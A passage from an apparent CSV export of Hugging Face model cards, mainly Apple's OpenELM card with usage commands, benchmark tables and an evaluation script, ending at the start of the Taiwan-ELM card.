blob_id=None, lfs=None)"", ""RepoSibling(rfilename='assets/model_rendering.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='assets/preprocessors.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='assets/sketch_rendering.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='diffusion_pytorch_model.fp16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='mistoLine_fp16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='mistoLine_rank256.safetensors', size=None, blob_id=None, lfs=None)""], ""spaces"": [""radames/Real-Time-Latent-Consistency-Model"", ""radames/Enhance-This-HiDiffusion-SDXL"", ""r3gm/DiffuseCraft"", ""John6666/DiffuseCraftMod"", ""radames/MistoLine-ControlNet-demo"", ""John6666/votepurchase-multiple-model"", ""fffiloni/sdxl-control-loras"", ""Shakker-Labs/FLUX.1-dev-ControlNet-Union-Pro-2.0"", ""Menyu/DiffuseCraftMod"", ""John6666/Enhance-This-HiDiffusion-SDXL"", ""bobber/DiffuseCraft"", ""awacke1/MistoLine-ControlNet-demo"", ""saikub/Text-To-Gif"", ""John6666/testvp"", ""realestate/TheMistoAI-MistoLine"", ""Headbandz/TheMistoAI-MistoLine"", ""seronda93/TheMistoAI-MistoLine"", ""jerry0719/TheMistoAI-MistoLine"", ""Faustrix/Image-Generator"", ""Faustrix/TheMistoAI-MistoLine"", ""ShabeehShakkir/TheMistoAI-MistoLine"", ""CaptainDao/TheMistoAI-MistoLine"", ""Phindx/TheMistoAI-MistoLine"", ""Donopot/TheMistoAI-MistoLine"", ""suxuefeng/TheMistoAI-MistoLine"", ""saleem12/TheMistoAI-MistoLine"", ""Ugottaloveit/TheMistoAI-MistoLine"", ""Bossmarc747/innohub-image-generators"", ""jasonkatz/TheMistoAI-MistoLine"", ""pantx/TheMistoAI-MistoLine"", ""lvkuan/TheMistoAI-MistoLine"", ""scribbyotx/stabilityai-stable-diffusion-xl-base-1.078"", 
""VitOliv/TheMistoAI-MistoLine_Test_aula"", ""Holiday12/TheMistoAI-MistoLine"", ""ahmedemara10/TheMistoAI-MistoLine"", ""Hazecnia/TheMistoAI-MistoLine"", ""kwhench/TheMistoAI-MistoLine"", ""pavankris/TheMistoAI-MistoLine"", ""blazekicker/TheMistoAI-MistoLine"", ""nofunstudio/TheMistoAI-MistoLine"", ""John6666/qwen2vl-flux-zero"", ""LAJILAODEEAIQ/officechat-DiffuseCraftMod"", ""eMILF2/real-time-model"", ""eienmojiki/DiffuseCraftMod"", ""John6666/Enhance-This-HiDiffusion-SDXL-Zero"", ""John6666/Enhance-This-HiDiffusion-SDXL-Zero-Gradio4"", ""LPX55/qwen2vl-flux""], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-05-17 12:17:27+00:00"", ""cardData"": ""license: openrail++\npipeline_tag: text-to-image\ntags:\n- art\n- stable diffusion\n- ControlNet\n- SDXL\n- Diffusion-XL"", ""transformersInfo"": null, ""_id"": ""6639ff34e2aa2c4973db4fbb"", ""modelId"": ""TheMistoAI/MistoLine"", ""usedStorage"": 3548847597}",0,,0,"https://huggingface.co/ALT2/123cfcx, https://huggingface.co/tom1-ll/RoseAllround, https://huggingface.co/luispine/wildfireIAUV, https://huggingface.co/Rolyaj/Clippy",4,,0,,0,"John6666/DiffuseCraftMod, John6666/Enhance-This-HiDiffusion-SDXL, John6666/Enhance-This-HiDiffusion-SDXL-Zero, John6666/votepurchase-multiple-model, Menyu/DiffuseCraftMod, Shakker-Labs/FLUX.1-dev-ControlNet-Union-Pro-2.0, awacke1/MistoLine-ControlNet-demo, bobber/DiffuseCraft, eienmojiki/DiffuseCraftMod, huggingface/InferenceSupport/discussions/new?title=TheMistoAI/MistoLine&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BTheMistoAI%2FMistoLine%5D(%2FTheMistoAI%2FMistoLine)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A, r3gm/DiffuseCraft, radames/Enhance-This-HiDiffusion-SDXL, saikub/Text-To-Gif",13
|
NV-Embed-v2_finetunes_20250426_014322.csv_finetunes_20250426_014322.csv
ADDED
|
The diff for this file is too large to render.
See raw diff
|
OpenELM_finetunes_20250424_193500.csv_finetunes_20250424_193500.csv
ADDED
|
@@ -0,0 +1,286 @@
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
apple/OpenELM,"---
|
| 3 |
+
license: other
|
| 4 |
+
license_name: apple-sample-code-license
|
| 5 |
+
license_link: LICENSE
|
| 6 |
+
---
|
| 7 |
+
|
| 8 |
+
# OpenELM: An Efficient Language Model Family with Open Training and Inference Framework
|
| 9 |
+
|
| 10 |
+
*Sachin Mehta, Mohammad Hossein Sekhavat, Qingqing Cao, Maxwell Horton, Yanzi Jin, Chenfan Sun, Iman Mirzadeh, Mahyar Najibi, Dmitry Belenko, Peter Zatloukal, Mohammad Rastegari*
|
| 11 |
+
|
| 12 |
+
We introduce **OpenELM**, a family of **Open** **E**fficient **L**anguage **M**odels. OpenELM uses a layer-wise scaling strategy to efficiently allocate parameters within each layer of the transformer model, leading to enhanced accuracy. We pretrained OpenELM models using the [CoreNet](https://github.com/apple/corenet) library. We release both pretrained and instruction tuned models with 270M, 450M, 1.1B and 3B parameters.
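As a rough illustration of the layer-wise scaling idea, per-layer widths (e.g., the number of attention heads and the FFN multiplier) can be interpolated across depth instead of kept uniform. The sketch below is illustrative; the constants are assumptions, not OpenELM's released configurations:

```python
# Sketch of layer-wise scaling: per-layer attention heads and FFN width
# grow linearly with depth rather than staying uniform across layers.
# Constants are illustrative, not OpenELM's released configurations.
num_layers = 16
min_heads, max_heads = 4, 12
min_ffn_mult, max_ffn_mult = 0.5, 4.0

for i in range(num_layers):
    t = i / (num_layers - 1)  # 0.0 at the first layer, 1.0 at the last
    heads = round(min_heads + t * (max_heads - min_heads))
    ffn_mult = min_ffn_mult + t * (max_ffn_mult - min_ffn_mult)
    print(f'layer {i:2d}: heads={heads:2d}, ffn_multiplier={ffn_mult:.2f}')
```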
|
| 13 |
+
|
| 14 |
+
Our pre-training dataset contains RefinedWeb, deduplicated PILE, a subset of RedPajama, and a subset of Dolma v1.6, totaling approximately 1.8 trillion tokens. Please check license agreements and terms of these datasets before using them.
|
| 15 |
+
|
| 16 |
+
See the list below for the details of each model:
|
| 17 |
+
|
| 18 |
+
- [OpenELM-270M](https://huggingface.co/apple/OpenELM-270M)
|
| 19 |
+
- [OpenELM-450M](https://huggingface.co/apple/OpenELM-450M)
|
| 20 |
+
- [OpenELM-1_1B](https://huggingface.co/apple/OpenELM-1_1B)
|
| 21 |
+
- [OpenELM-3B](https://huggingface.co/apple/OpenELM-3B)
|
| 22 |
+
- [OpenELM-270M-Instruct](https://huggingface.co/apple/OpenELM-270M-Instruct)
|
| 23 |
+
- [OpenELM-450M-Instruct](https://huggingface.co/apple/OpenELM-450M-Instruct)
|
| 24 |
+
- [OpenELM-1_1B-Instruct](https://huggingface.co/apple/OpenELM-1_1B-Instruct)
|
| 25 |
+
- [OpenELM-3B-Instruct](https://huggingface.co/apple/OpenELM-3B-Instruct)
|
| 26 |
+
|
| 27 |
+
|
| 28 |
+
```python
|
| 29 |
+
|
| 30 |
+
from transformers import AutoModelForCausalLM
|
| 31 |
+
|
| 32 |
+
openelm_270m = AutoModelForCausalLM.from_pretrained(""apple/OpenELM-270M"", trust_remote_code=True)
|
| 33 |
+
openelm_450m = AutoModelForCausalLM.from_pretrained(""apple/OpenELM-450M"", trust_remote_code=True)
|
| 34 |
+
openelm_1b = AutoModelForCausalLM.from_pretrained(""apple/OpenELM-1_1B"", trust_remote_code=True)
|
| 35 |
+
openelm_3b = AutoModelForCausalLM.from_pretrained(""apple/OpenELM-3B"", trust_remote_code=True)
|
| 36 |
+
|
| 37 |
+
openelm_270m_instruct = AutoModelForCausalLM.from_pretrained(""apple/OpenELM-270M-Instruct"", trust_remote_code=True)
|
| 38 |
+
openelm_450m_instruct = AutoModelForCausalLM.from_pretrained(""apple/OpenELM-450M-Instruct"", trust_remote_code=True)
|
| 39 |
+
openelm_1b_instruct = AutoModelForCausalLM.from_pretrained(""apple/OpenELM-1_1B-Instruct"", trust_remote_code=True)
|
| 40 |
+
openelm_3b_instruct = AutoModelForCausalLM.from_pretrained(""apple/OpenELM-3B-Instruct"", trust_remote_code=True)
|
| 41 |
+
|
| 42 |
+
```
|
| 43 |
+
|
| 44 |
+
## Usage
|
| 45 |
+
|
| 46 |
+
We have provided an example function to generate output from OpenELM models loaded via [HuggingFace Hub](https://huggingface.co/docs/hub/) in `generate_openelm.py`.
|
| 47 |
+
|
| 48 |
+
You can try the model by running the following command:
|
| 49 |
+
```
|
| 50 |
+
python generate_openelm.py --model [MODEL_NAME] --hf_access_token [HF_ACCESS_TOKEN] --prompt 'Once upon a time there was' --generate_kwargs repetition_penalty=1.2
|
| 51 |
+
```
|
| 52 |
+
Please refer to [this link](https://huggingface.co/docs/hub/security-tokens) to obtain your Hugging Face access token.
|
| 53 |
+
|
| 54 |
+
Additional arguments to the Hugging Face `generate` function can be passed via `generate_kwargs`. For example, to speed up inference, you can try [lookup token speculative generation](https://huggingface.co/docs/transformers/generation_strategies) by passing the `prompt_lookup_num_tokens` argument as follows:
|
| 55 |
+
```
|
| 56 |
+
python generate_openelm.py --model [MODEL_NAME] --hf_access_token [HF_ACCESS_TOKEN] --prompt 'Once upon a time there was' --generate_kwargs repetition_penalty=1.2 prompt_lookup_num_tokens=10
|
| 57 |
+
```
|
| 58 |
+
Alternatively, try model-wise speculative generation with an [assistive model](https://huggingface.co/blog/assisted-generation) by passing a smaller model through the `assistant_model` argument, for example:
|
| 59 |
+
```
|
| 60 |
+
python generate_openelm.py --model [MODEL_NAME] --hf_access_token [HF_ACCESS_TOKEN] --prompt 'Once upon a time there was' --generate_kwargs repetition_penalty=1.2 --assistant_model [SMALLER_MODEL_NAME]
|
| 61 |
+
```
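Both flags map onto standard `transformers` generation arguments; a minimal sketch of the direct API calls, assuming a recent `transformers` version and access to the LLaMA tokenizer (the model choices here are illustrative):

```python
from transformers import AutoModelForCausalLM, AutoTokenizer

# OpenELM reuses the LLaMA tokenizer (see the evaluation setup below)
tok = AutoTokenizer.from_pretrained('meta-llama/Llama-2-7b-hf')
model = AutoModelForCausalLM.from_pretrained('apple/OpenELM-1_1B', trust_remote_code=True)
inputs = tok('Once upon a time there was', return_tensors='pt')

# Prompt-lookup speculative generation
out = model.generate(**inputs, repetition_penalty=1.2, prompt_lookup_num_tokens=10)

# Model-wise speculative generation with a smaller assistant model
assistant = AutoModelForCausalLM.from_pretrained('apple/OpenELM-270M', trust_remote_code=True)
out = model.generate(**inputs, repetition_penalty=1.2, assistant_model=assistant)
print(tok.decode(out[0]))
```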
|
| 62 |
+
|
| 63 |
+
|
| 64 |
+
## Main Results
|
| 65 |
+
|
| 66 |
+
### Zero-Shot
|
| 67 |
+
|
| 68 |
+
| **Model Size** | **ARC-c** | **ARC-e** | **BoolQ** | **HellaSwag** | **PIQA** | **SciQ** | **WinoGrande** | **Average** |
|
| 69 |
+
|-----------------------------------------------------------------------------|-----------|-----------|-----------|---------------|-----------|-----------|----------------|-------------|
|
| 70 |
+
| [OpenELM-270M](https://huggingface.co/apple/OpenELM-270M) | 26.45 | 45.08 | **53.98** | 46.71 | 69.75 | **84.70** | **53.91** | 54.37 |
|
| 71 |
+
| [OpenELM-270M-Instruct](https://huggingface.co/apple/OpenELM-270M-Instruct) | **30.55** | **46.68** | 48.56 | **52.07** | **70.78** | 84.40 | 52.72 | **55.11** |
|
| 72 |
+
| [OpenELM-450M](https://huggingface.co/apple/OpenELM-450M) | 27.56 | 48.06 | 55.78 | 53.97 | 72.31 | 87.20 | 58.01 | 57.56 |
|
| 73 |
+
| [OpenELM-450M-Instruct](https://huggingface.co/apple/OpenELM-450M-Instruct) | **30.38** | **50.00** | **60.37** | **59.34** | **72.63** | **88.00** | **58.96** | **59.95** |
|
| 74 |
+
| [OpenELM-1_1B](https://huggingface.co/apple/OpenELM-1_1B) | 32.34 | **55.43** | 63.58 | 64.81 | **75.57** | **90.60** | 61.72 | 63.44 |
|
| 75 |
+
| [OpenELM-1_1B-Instruct](https://huggingface.co/apple/OpenELM-1_1B-Instruct) | **37.97** | 52.23 | **70.00** | **71.20** | 75.03 | 89.30 | **62.75** | **65.50** |
|
| 76 |
+
| [OpenELM-3B](https://huggingface.co/apple/OpenELM-3B) | 35.58 | 59.89 | 67.40 | 72.44 | 78.24 | **92.70** | 65.51 | 67.39 |
|
| 77 |
+
| [OpenELM-3B-Instruct](https://huggingface.co/apple/OpenELM-3B-Instruct) | **39.42** | **61.74** | **68.17** | **76.36** | **79.00** | 92.50 | **66.85** | **69.15** |
|
| 78 |
+
|
| 79 |
+
### LLM360
|
| 80 |
+
|
| 81 |
+
| **Model Size** | **ARC-c** | **HellaSwag** | **MMLU** | **TruthfulQA** | **WinoGrande** | **Average** |
|
| 82 |
+
|-----------------------------------------------------------------------------|-----------|---------------|-----------|----------------|----------------|-------------|
|
| 83 |
+
| [OpenELM-270M](https://huggingface.co/apple/OpenELM-270M) | 27.65 | 47.15 | 25.72 | **39.24** | **53.83** | 38.72 |
|
| 84 |
+
| [OpenELM-270M-Instruct](https://huggingface.co/apple/OpenELM-270M-Instruct) | **32.51** | **51.58** | **26.70** | 38.72 | 53.20 | **40.54** |
|
| 85 |
+
| [OpenELM-450M](https://huggingface.co/apple/OpenELM-450M) | 30.20 | 53.86 | **26.01** | 40.18 | 57.22 | 41.50 |
|
| 86 |
+
| [OpenELM-450M-Instruct](https://huggingface.co/apple/OpenELM-450M-Instruct) | **33.53** | **59.31** | 25.41 | **40.48** | **58.33** | **43.41** |
|
| 87 |
+
| [OpenELM-1_1B](https://huggingface.co/apple/OpenELM-1_1B) | 36.69 | 65.71 | **27.05** | 36.98 | 63.22 | 45.93 |
|
| 88 |
+
| [OpenELM-1_1B-Instruct](https://huggingface.co/apple/OpenELM-1_1B-Instruct) | **41.55** | **71.83** | 25.65 | **45.95** | **64.72** | **49.94** |
|
| 89 |
+
| [OpenELM-3B](https://huggingface.co/apple/OpenELM-3B) | 42.24 | 73.28 | **26.76** | 34.98 | 67.25 | 48.90 |
|
| 90 |
+
| [OpenELM-3B-Instruct](https://huggingface.co/apple/OpenELM-3B-Instruct) | **47.70** | **76.87** | 24.80 | **38.76** | **67.96** | **51.22** |
|
| 91 |
+
|
| 92 |
+
|
| 93 |
+
### OpenLLM Leaderboard
|
| 94 |
+
|
| 95 |
+
| **Model Size** | **ARC-c** | **CrowS-Pairs** | **HellaSwag** | **MMLU** | **PIQA** | **RACE** | **TruthfulQA** | **WinoGrande** | **Average** |
|
| 96 |
+
|-----------------------------------------------------------------------------|-----------|-----------------|---------------|-----------|-----------|-----------|----------------|----------------|-------------|
|
| 97 |
+
| [OpenELM-270M](https://huggingface.co/apple/OpenELM-270M) | 27.65 | **66.79** | 47.15 | 25.72 | 69.75 | 30.91 | **39.24** | **53.83** | 45.13 |
|
| 98 |
+
| [OpenELM-270M-Instruct](https://huggingface.co/apple/OpenELM-270M-Instruct) | **32.51** | 66.01 | **51.58** | **26.70** | **70.78** | 33.78 | 38.72 | 53.20 | **46.66** |
|
| 99 |
+
| [OpenELM-450M](https://huggingface.co/apple/OpenELM-450M) | 30.20 | **68.63** | 53.86 | **26.01** | 72.31 | 33.11 | 40.18 | 57.22 | 47.69 |
|
| 100 |
+
| [OpenELM-450M-Instruct](https://huggingface.co/apple/OpenELM-450M-Instruct) | **33.53** | 67.44 | **59.31** | 25.41 | **72.63** | **36.84** | **40.48** | **58.33** | **49.25** |
|
| 101 |
+
| [OpenELM-1_1B](https://huggingface.co/apple/OpenELM-1_1B) | 36.69 | **71.74** | 65.71 | **27.05** | **75.57** | 36.46 | 36.98 | 63.22 | 51.68 |
|
| 102 |
+
| [OpenELM-1_1B-Instruct](https://huggingface.co/apple/OpenELM-1_1B-Instruct) | **41.55** | 71.02 | **71.83** | 25.65 | 75.03 | **39.43** | **45.95** | **64.72** | **54.40** |
|
| 103 |
+
| [OpenELM-3B](https://huggingface.co/apple/OpenELM-3B) | 42.24 | **73.29** | 73.28 | **26.76** | 78.24 | **38.76** | 34.98 | 67.25 | 54.35 |
|
| 104 |
+
| [OpenELM-3B-Instruct](https://huggingface.co/apple/OpenELM-3B-Instruct) | **47.70** | 72.33 | **76.87** | 24.80 | **79.00** | 38.47 | **38.76** | **67.96** | **55.73** |
|
| 105 |
+
|
| 106 |
+
See the technical report for more results and comparisons.
|
| 107 |
+
|
| 108 |
+
## Evaluation
|
| 109 |
+
|
| 110 |
+
### Setup
|
| 111 |
+
|
| 112 |
+
Install the following dependencies:
|
| 113 |
+
|
| 114 |
+
```bash
|
| 115 |
+
|
| 116 |
+
# install public lm-eval-harness
|
| 117 |
+
|
| 118 |
+
harness_repo=""public-lm-eval-harness""
|
| 119 |
+
git clone https://github.com/EleutherAI/lm-evaluation-harness ${harness_repo}
|
| 120 |
+
cd ${harness_repo}
|
| 121 |
+
# use main branch on 03-15-2024, SHA is dc90fec
|
| 122 |
+
git checkout dc90fec
|
| 123 |
+
pip install -e .
|
| 124 |
+
cd ..
|
| 125 |
+
|
| 126 |
+
# 66d6242 is the main branch on 2024-04-01
|
| 127 |
+
pip install datasets@git+https://github.com/huggingface/datasets.git@66d6242
|
| 128 |
+
pip install tokenizers>=0.15.2 transformers>=4.38.2 sentencepiece>=0.2.0
|
| 129 |
+
|
| 130 |
+
```
|
| 131 |
+
|
| 132 |
+
### Evaluate OpenELM
|
| 133 |
+
|
| 134 |
+
```bash
|
| 135 |
+
|
| 136 |
+
# OpenELM-270M
|
| 137 |
+
hf_model=apple/OpenELM-270M
|
| 138 |
+
|
| 139 |
+
# This flag is needed because lm-eval-harness sets add_bos_token to False by default, but OpenELM uses the LLaMA tokenizer, which requires add_bos_token to be True
|
| 140 |
+
tokenizer=meta-llama/Llama-2-7b-hf
|
| 141 |
+
add_bos_token=True
|
| 142 |
+
batch_size=1
|
| 143 |
+
|
| 144 |
+
mkdir lm_eval_output
|
| 145 |
+
|
| 146 |
+
shot=0
|
| 147 |
+
task=arc_challenge,arc_easy,boolq,hellaswag,piqa,race,winogrande,sciq,truthfulqa_mc2
|
| 148 |
+
lm_eval --model hf \
|
| 149 |
+
--model_args pretrained=${hf_model},trust_remote_code=True,add_bos_token=${add_bos_token},tokenizer=${tokenizer} \
|
| 150 |
+
--tasks ${task} \
|
| 151 |
+
--device cuda:0 \
|
| 152 |
+
--num_fewshot ${shot} \
|
| 153 |
+
--output_path ./lm_eval_output/${hf_model//\//_}_${task//,/_}-${shot}shot \
|
| 154 |
+
--batch_size ${batch_size} 2>&1 | tee ./lm_eval_output/eval-${hf_model//\//_}_${task//,/_}-${shot}shot.log
|
| 155 |
+
|
| 156 |
+
shot=5
|
| 157 |
+
task=mmlu,winogrande
|
| 158 |
+
lm_eval --model hf \
|
| 159 |
+
--model_args pretrained=${hf_model},trust_remote_code=True,add_bos_token=${add_bos_token},tokenizer=${tokenizer} \
|
| 160 |
+
--tasks ${task} \
|
| 161 |
+
--device cuda:0 \
|
| 162 |
+
--num_fewshot ${shot} \
|
| 163 |
+
--output_path ./lm_eval_output/${hf_model//\//_}_${task//,/_}-${shot}shot \
|
| 164 |
+
--batch_size ${batch_size} 2>&1 | tee ./lm_eval_output/eval-${hf_model//\//_}_${task//,/_}-${shot}shot.log
|
| 165 |
+
|
| 166 |
+
shot=25
|
| 167 |
+
task=arc_challenge,crows_pairs_english
|
| 168 |
+
lm_eval --model hf \
|
| 169 |
+
--model_args pretrained=${hf_model},trust_remote_code=True,add_bos_token=${add_bos_token},tokenizer=${tokenizer} \
|
| 170 |
+
--tasks ${task} \
|
| 171 |
+
--device cuda:0 \
|
| 172 |
+
--num_fewshot ${shot} \
|
| 173 |
+
--output_path ./lm_eval_output/${hf_model//\//_}_${task//,/_}-${shot}shot \
|
| 174 |
+
--batch_size ${batch_size} 2>&1 | tee ./lm_eval_output/eval-${hf_model//\//_}_${task//,/_}-${shot}shot.log
|
| 175 |
+
|
| 176 |
+
shot=10
|
| 177 |
+
task=hellaswag
|
| 178 |
+
lm_eval --model hf \
|
| 179 |
+
--model_args pretrained=${hf_model},trust_remote_code=True,add_bos_token=${add_bos_token},tokenizer=${tokenizer} \
|
| 180 |
+
--tasks ${task} \
|
| 181 |
+
--device cuda:0 \
|
| 182 |
+
--num_fewshot ${shot} \
|
| 183 |
+
--output_path ./lm_eval_output/${hf_model//\//_}_${task//,/_}-${shot}shot \
|
| 184 |
+
--batch_size ${batch_size} 2>&1 | tee ./lm_eval_output/eval-${hf_model//\//_}_${task//,/_}-${shot}shot.log
|
| 185 |
+
|
| 186 |
+
```
|
| 187 |
+
|
| 188 |
+
|
| 189 |
+
## Bias, Risks, and Limitations
|
| 190 |
+
|
| 191 |
+
The release of OpenELM models aims to empower and enrich the open research community by providing access to state-of-the-art language models. Trained on publicly available datasets, these models are made available without any safety guarantees. Consequently, there exists the possibility of these models producing outputs that are inaccurate, harmful, biased, or objectionable in response to user prompts. Thus, it is imperative for users and developers to undertake thorough safety testing and implement appropriate filtering mechanisms tailored to their specific requirements.
|
| 192 |
+
|
| 193 |
+
## Citation
|
| 194 |
+
|
| 195 |
+
If you find our work useful, please cite:
|
| 196 |
+
|
| 197 |
+
```BibTex
|
| 198 |
+
@article{mehtaOpenELMEfficientLanguage2024,
|
| 199 |
+
title = {{OpenELM}: {An} {Efficient} {Language} {Model} {Family} with {Open} {Training} and {Inference} {Framework}},
|
| 200 |
+
shorttitle = {{OpenELM}},
|
| 201 |
+
url = {https://arxiv.org/abs/2404.14619v1},
|
| 202 |
+
language = {en},
|
| 203 |
+
urldate = {2024-04-24},
|
| 204 |
+
journal = {arXiv.org},
|
| 205 |
+
author = {Mehta, Sachin and Sekhavat, Mohammad Hossein and Cao, Qingqing and Horton, Maxwell and Jin, Yanzi and Sun, Chenfan and Mirzadeh, Iman and Najibi, Mahyar and Belenko, Dmitry and Zatloukal, Peter and Rastegari, Mohammad},
|
| 206 |
+
month = apr,
|
| 207 |
+
year = {2024},
|
| 208 |
+
}
|
| 209 |
+
|
| 210 |
+
@inproceedings{mehta2022cvnets,
|
| 211 |
+
author = {Mehta, Sachin and Abdolhosseini, Farzad and Rastegari, Mohammad},
|
| 212 |
+
title = {CVNets: High Performance Library for Computer Vision},
|
| 213 |
+
year = {2022},
|
| 214 |
+
booktitle = {Proceedings of the 30th ACM International Conference on Multimedia},
|
| 215 |
+
series = {MM '22}
|
| 216 |
+
}
|
| 217 |
+
```
|
| 218 |
+
","{""id"": ""apple/OpenELM"", ""author"": ""apple"", ""sha"": ""602b24f644595960864ed3de780a4ef9889315ed"", ""last_modified"": ""2024-05-02 00:54:23+00:00"", ""created_at"": ""2024-04-17 20:01:04+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 1434, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""arxiv:2404.14619"", ""license:other"", ""region:us""], ""pipeline_tag"": null, ""mask_token"": null, ""trending_score"": null, ""card_data"": ""license: other\nlicense_name: apple-sample-code-license\nlicense_link: LICENSE"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='LICENSE', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generate_openelm.py', size=None, blob_id=None, lfs=None)""], ""spaces"": [""Norod78/OpenELM_3B_Demo"", ""cmjatom/OpenELM_3B_Demo"", ""KvrParaskevi/OpenELM_3B_Demo"", ""JERNGOC/Apple_elm_test""], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-05-02 00:54:23+00:00"", ""cardData"": ""license: other\nlicense_name: apple-sample-code-license\nlicense_link: LICENSE"", ""transformersInfo"": null, ""_id"": ""66202a80b6b17117b91a7a55"", ""modelId"": ""apple/OpenELM"", ""usedStorage"": 0}",0,"https://huggingface.co/liswei/Taiwan-ELM, https://huggingface.co/cpu4dream/llava-small-OpenELM-AIMv2-0.6B",2,,0,https://huggingface.co/cpu4dream/llava-small-OpenELM-AIMv2-0.6B-auto,1,,0,"JERNGOC/Apple_elm_test, KvrParaskevi/OpenELM_3B_Demo, Norod78/OpenELM_3B_Demo, cmjatom/OpenELM_3B_Demo, huggingface/InferenceSupport/discussions/new?title=apple/OpenELM&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bapple%2FOpenELM%5D(%2Fapple%2FOpenELM)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A",5
|
| 219 |
+
liswei/Taiwan-ELM,"---
|
| 220 |
+
license: apache-2.0
|
| 221 |
+
datasets:
|
| 222 |
+
- liswei/Taiwan-Text-Excellence-2B
|
| 223 |
+
- liswei/PromptPair-TW
|
| 224 |
+
- yentinglin/TaiwanChat
|
| 225 |
+
base_model: apple/OpenELM
|
| 226 |
+
language:
|
| 227 |
+
- zh
|
| 228 |
+
---
|
| 229 |
+
|
| 230 |
+
<center>
|
| 231 |
+
<img src=""https://huggingface.co/liswei/Taiwan-ELM/resolve/main/Taiwan%20ELM%20Logo.jpeg"" alt=""Efficient LLM for Taiwan"">
|
| 232 |
+
</center>
|
| 233 |
+
|
| 234 |
+
> Efficient LLM for Taiwan with open weights/datasets/checkpoints and affordable sizes (270M/1.1B)
|
| 235 |
+
|
| 236 |
+
# Taiwan ELM
|
| 237 |
+
|
| 238 |
+
Taiwan ELM is a family of Efficient LLMs for Taiwan based on [apple/OpenELM](https://huggingface.co/apple/OpenELM).
|
| 239 |
+
The project aims to provide an efficient model for researchers without access to large-scale computing resources.
|
| 240 |
+
|
| 241 |
+
The model is trained using [LLaMA-Factory](https://github.com/hiyouga/LLaMA-Factory) on 2B Traditional Chinese tokens and 500K instruction samples.
|
| 242 |
+
We will extend the model to train on larger datasets and different base models if there is sufficient demand.
|
| 243 |
+
|
| 244 |
+
## What is being released?
|
| 245 |
+
|
| 246 |
+
We release both pre-trained **base models and instruction-tuned variants** with 270M and 1.1B parameters.
|
| 247 |
+
Along with the models, the **datasets used to train them** are also released.
|
| 248 |
+
|
| 249 |
+
In an effort to improve transparency, training **checkpoints (including rng/optimizer state) and logs** are also released on the model page.
|
| 250 |
+
|
| 251 |
+
List of released models:
|
| 252 |
+
* [Taiwan-ELM-270M](https://huggingface.co/liswei/Taiwan-ELM-270M)
|
| 253 |
+
* [Taiwan-ELM-1_1B](https://huggingface.co/liswei/Taiwan-ELM-1_1B)
|
| 254 |
+
* [Taiwan-ELM-270M-Instruct](https://huggingface.co/liswei/Taiwan-ELM-270M-Instruct)
|
| 255 |
+
* [Taiwan-ELM-1_1B-Instruct](https://huggingface.co/liswei/Taiwan-ELM-1_1B-Instruct)
|
| 256 |
+
|
| 257 |
+
List of released datasets:
|
| 258 |
+
* [liswei/Taiwan-Text-Excellence-2B](https://huggingface.co/datasets/liswei/Taiwan-Text-Excellence-2B)
|
| 259 |
+
* [liswei/PromptPair-TW](https://huggingface.co/datasets/liswei/PromptPair-TW)
|
| 260 |
+
* [liswei/wikinews-zhtw-dedup](https://huggingface.co/datasets/liswei/wikinews-zhtw-dedup)
|
| 261 |
+
* [liswei/wikipedia-zhtw-dedup](https://huggingface.co/datasets/liswei/wikipedia-zhtw-dedup)
|
| 262 |
+
* [liswei/coct-en-zhtw-dedup](https://huggingface.co/datasets/liswei/coct-en-zhtw-dedup)
|
| 263 |
+
|
| 264 |
+
Some datasets that were not used for training Taiwan ELM are also released:
|
| 265 |
+
* [liswei/common-crawl-zhtw](https://huggingface.co/datasets/liswei/common-crawl-zhtw)
|
| 266 |
+
* [liswei/c4-zhtw](https://huggingface.co/datasets/liswei/c4-zhtw)
|
| 267 |
+
* [liswei/rm-static-zhTW](https://huggingface.co/datasets/liswei/rm-static-zhTW)
|
| 268 |
+
|
| 269 |
+
## Usage Examples
|
| 270 |
+
|
| 271 |
+
For instruction-tuned models, we adopt the [LLaMA2](https://huggingface.co/meta-llama/Llama-2-7b-chat-hf) template:
|
| 272 |
+
```jinja2
|
| 273 |
+
<s>[INST] <<SYS>>
|
| 274 |
+
{{ system_prompt }}
|
| 275 |
+
<</SYS>>
|
| 276 |
+
|
| 277 |
+
{{ user_message }} [/INST]
|
| 278 |
+
```
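Filling this template by hand is straightforward; a minimal sketch with placeholder system and user strings:

```python
# Minimal sketch: format a prompt with the LLaMA2-style template above.
system_prompt = 'You are a helpful assistant.'  # placeholder
user_message = 'Tell me about Taiwan.'          # placeholder
prompt = (
    f'<s>[INST] <<SYS>>\n{system_prompt}\n<</SYS>>\n\n'
    f'{user_message} [/INST]'
)
print(prompt)
```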
|
| 279 |
+
|
| 280 |
+
The model can be loaded via `AutoModelForCausalLM` or `text-generation-inference` with `trust_remote_code=True`:
|
| 281 |
+
```python
|
| 282 |
+
taiwan_elm_270m = AutoModelForCausalLM.from_pretrained(""liswei/Taiwan-ELM-270M"", trust_remote_code=True)
|
| 283 |
+
```
|
